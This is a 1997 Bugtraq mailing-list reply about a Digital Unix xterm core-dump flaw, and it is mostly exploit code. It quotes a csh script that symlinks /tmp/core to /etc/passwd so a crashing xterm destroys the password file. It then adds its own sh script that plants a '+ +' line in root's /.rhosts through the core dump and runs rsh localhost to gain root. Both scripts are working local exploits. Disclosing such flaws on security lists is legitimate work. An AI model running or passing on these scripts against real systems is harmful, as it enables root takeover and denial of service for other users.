[5588] in bugtraq
Re: Digital Unix Security Problem
daemon@ATHENA.MIT.EDU (Andrew Brown)
Thu Nov 13 12:27:53 1997
Errors-To: receipts@daemon.org
Date: Thu, 13 Nov 1997 11:32:23 -0500
Reply-To: Andrew Brown <codewarrior@daemon.org>
From: Andrew Brown <codewarrior@DAEMON.ORG>
X-To: tom@sba.miami.edu
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.OSF.3.96.971112142044.12555C-100000@homer.bus.miami.edu>
from "Tom Leffingwell" at Nov 12, 97 02:51:40 pm
> Even with a buffer overflow, I've never seen anyone exploit on one
>DU. If anyone has done so sucessfully, plese email me. Despite that, a
>person with basic knowledge of unix could easily do something like:
>
>#/!bin/csh
>cd /tmp
>ln -s /etc/passwd /tmp/core
>setenv DISPLAY abcdefghi
>/usr/bin/X11/xterm
>
> The contents of /etc/passwd becomes xterm's core, preventing
>further logins. Obviously you could do things without an immediate impact
>such as ln -s /vmunix /tmp/core.
or...if the system you're on is actually running r-services, you could do
#!/bin/sh
DISPLAY="
+ +
"
export DISPLAY
cd /tmp
ln -s /.rhosts /tmp/core
/usr/bin/X11/xterm
rsh localhost
which sets the DISPLAY variable to an "admit all from all" line and
the core dump will go into root's .rhosts file. then all that remains
is the rsh localhost and you're all set!
considerably easier than a buffer overflow exploit...
--
|-----< "CODE WARRIOR" >-----|
andrew@echonyc.com (TheMan) * "ah! i see you have the internet
codewarrior@daemon.org that goes *ping*!"
warfare@graffiti.com * "information is power -- share the wealth."
